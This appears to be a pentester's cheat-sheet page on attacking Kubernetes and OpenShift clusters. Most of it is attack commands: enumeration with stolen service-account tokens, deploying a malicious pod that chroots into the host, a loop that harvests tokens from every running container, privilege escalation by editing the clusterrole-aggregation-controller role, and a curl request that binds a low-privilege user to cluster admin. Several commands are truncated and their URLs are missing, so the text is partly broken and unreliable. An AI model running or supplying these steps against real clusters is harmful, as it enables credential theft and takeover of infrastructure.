Comment on page

Containerization / Orchestration



Get kubectl:
curl -LO`curl -s`/bin/linux/amd64/kubectl
chmod +x ./kubectl
sudo mv ./kubectl /usr/local/bin/kubectl
kubectl version --client
Basic authenticated enumeration (the service account token from /run/secrets/ can be parsed at
$ kubectl auth can-i --list
$ kubectl get namespaces
$ kubectl auth can-i --list -n <NAMESPACE>
$ kubectl get pods -n <NAMESPACE>
$ kubectl describe pods <POD> -n <NAMESPACE>
$ kubectl get secrets -n <NAMESPACE>
$ kubectl describe secrets -n <NAMESPACE>
$ kubectl --token=$(cat token) auth can-i create pods
To use kubectl from a remote host:
$ ls -la {/run/secrets,/var/run/secrets,/secrets}/
$ kubectl auth can-i --list -n kube-system --token `cat token` --server --certificate-authority ca.crt
Due to proxychains mostly does not work with Go binaries, export HTTPS_PROXY=socks5://localhost:1080 in order to use kubectl through a SOCKS tunnel.

Malicious Pods

Deploy a malicious pod:
$ kubectl apply -f evilpod.yml
$ kubectl exec --stdin --tty -it evilpod -- chroot /hostfs bash

Kubernetes API Server Paths

Check these kube-apiserver paths for anonymous access (stolen from HackTricks):

Pod Escape

CVE-2022-0492 (cgroups)

Node Post-Exploitation


A study case in taking over the cluster after escaping from a pod to a worker node.
Extract tokens from all the running containers:
$ for c in `docker ps -q`; do echo $c; docker exec $c 'cat /var/run/secrets/' | tee tokens/$c; echo; echo; done
Check privileges of each token:
$ for t in `ls tokens`; do echo $t; kubectl --token `cat tokens/$t --server --certificate-authority ca.crt auth can-i --list -n kube-system; done
List kube-system secrets with a discovered privileged token:
$ kubectl --token `cat tokens/1337deadbeef` --server --certificate-authority ca.crt get secrets [-o yaml] -n kube-system
Add exec privilege with clusterrole-aggregation-controller token to itself:
$ kubectl --token `cat clusterrole-aggregation-controller-token` --server --certificate-authority ca.crt auth can-i create pods --subresource exec -n kube-system
$ kubectl --token `cat clusterrole-aggregation-controller-token` --server --certificate-authority ca.crt edit clusterrole system:controller:clusterrole-aggregation-controller
- pods
- pods/exec
- create
$ kubectl --token `cat clusterrole-aggregation-controller-token` --server --certificate-authority ca.crt auth can-i create pods --subresource exec -n kube-system
Look for a privileged pod to exec into it:
$ kubectl --kubeconfig /etc/kubernetes/kubelet-kubeconfig.conf get pods --all-namespaces -o wide --filed-selector spec.nodeName=kube-master-01
$ kubectl --kubeconfig /etc/kubernetes/kubelet-kubeconfig.conf get pods some-pod-name -n some-namespace -o json | grep privileged
"privileged": true
Do it:
$ kubectl --token `cat clusterrole-aggregation-controller-token` --server --certificate-authority ca.crt exec -it some-pod-name -- bash
cat /proc/self/status | grep Cap



$ kube-hunter --cidr --active

Training Labs

Red Hat OpenShift

Grant a low-priv user admin's privileges across the cluster via REST API:
curl -k -X POST 'https://cluster.megacorp.local:8443/apis/' \
-H 'Authorization: Bearer <TOKEN>' \
-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
"kind": "ClusterRoleBinding",
"apiVersion": "",
"metadata": {
"name": "pwned",
"creationTimestamp": null
"subjects": [
"kind": "User",
"apiGroup": "",
"roleRef": {
"apiGroup": "",
"kind": "ClusterRole",
"name": "admin"
Last modified 2mo ago